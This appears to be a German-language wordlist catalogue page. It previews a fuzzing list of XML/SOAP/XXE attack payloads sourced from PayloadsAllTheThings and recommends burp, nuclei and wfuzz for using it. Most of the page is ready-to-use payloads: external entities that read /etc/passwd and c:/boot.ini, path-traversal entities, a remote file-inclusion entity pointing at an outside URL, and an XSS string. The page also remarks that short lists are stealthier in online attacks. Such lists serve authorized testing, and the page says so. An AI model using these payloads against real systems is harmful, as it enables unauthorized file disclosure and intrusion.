XML / SOAP Attack Payloads
XML/SOAP/XXE-Angriffs-Payloads: externe SYSTEM-Entity-Dateilesevorgänge, RFI-Entities, XML-RPC-methodCall-Strukturen und Entity-Expansion-Vektoren.
- Größe
- 8.0 KB
- Kategorie
- Fuzzing
- Quelle
- swisskyrepo/PayloadsAllTheThings
- Lizenz
- MIT
- Empfohlene Tools
- burpnucleiwfuzz
Vorschau
Die ersten 15 Einträge. Lade die vollständige Liste (8.0 KB) herunter oder kopiere sie über die Schaltflächen oben.
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [ <!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<!DOCTYPE foo [<!ENTITY xxe7eb97 SYSTEM "file:///etc/passwd"> ]>
<!DOCTYPE foo [<!ENTITY xxe7eb97 SYSTEM "file:///c:/boot.ini"> ]>
<!DOCTYPE foo [<!ENTITY xxe46471 SYSTEM "http://crowdshield.com/.testing/rfi_vuln.txt"> ]>
<?xml version="1.0"?><methodCall><methodName>demo.sayHello</methodName><params></params></methodCall>
<?xml version="1.0"?><change-log><text>Hello World</text></change-log>
<?xml version="1.0"?><change-log><text>"Hello World"</text></change-log>
<?xml version="1.0"?><!DOCTYPE change-log[ <!ENTITY myEntity "World"> ]><change-log><text>Hello &myEntity;</text></change-log>
<?xml version="1.0"?><!DOCTYPE change-log[ <!ENTITY myEntity "World"><!ENTITY myQuote """> ]><change-log><text>&myQuote;Hello &myEntity;&myQuote;</text></change-log>
<!ENTITY systemEntity SYSTEM "robots.txt">
<change-log> <text>&systemEntity;</text> </change-log>
<?xml version="1.0"?> <!DOCTYPE change-log [ <!ENTITY systemEntity SYSTEM "robots.txt"> ]> <change-log> <text>&systemEntity;</text> </change-log>
<?xml version="1.0"?> <!DOCTYPE change-log [ <!ENTITY systemEntity SYSTEM "../../../../boot.ini"> ]> <change-log> <text>&systemEntity;</text> </change-log>
<?xml version="1.0"?> <!DOCTYPE change-log [ <!ENTITY systemEntity SYSTEM "robots.txt"> ]> <change-log> <text>&systemEntity;</text>; </change-log>
<test> $lDOMDocument->textContent=<![CDATA[<]]>script<![CDATA[>]]>alert('XSS')<![CDATA[<]]>/script<![CDATA[>]]> </test>XML/SOAP/XXE-Angriffs-Payloads: externe SYSTEM-Entity-Dateilesevorgänge, RFI-Entities, XML-RPC-methodCall-Strukturen und Entity-Expansion-Vektoren.
Diese Liste ist auf das Input-Fuzzing und die Schwachstellenerkennung ausgerichtet. Sie umfasst etwa 8.0 KB und harmoniert gut mit Tools wie burp, nuclei, wfuzz. Wähle die kleinste Liste, die zu deinem Auftrag passt: Kürzere Listen sind schneller und unauffälliger bei Online- Angriffen, während größere Listen eine breitere Abdeckung für Offline-Arbeiten bieten, bei denen Geschwindigkeit weniger ins Gewicht fällt.
Du kannst die Beispielvorschau direkt von dieser Seite kopieren, die gesamte Liste in
deine Zwischenablage kopieren oder die rohe .txt-Datei herunterladen. Die vollständige Liste wird direkt
aus ihrer Originalquelle auf GitHub ausgeliefert.
Bezogen von swisskyrepo/PayloadsAllTheThings und unter MIT vertrieben. Verwende Wortlisten nur gegen Systeme, für deren Test du ausdrücklich autorisiert bist.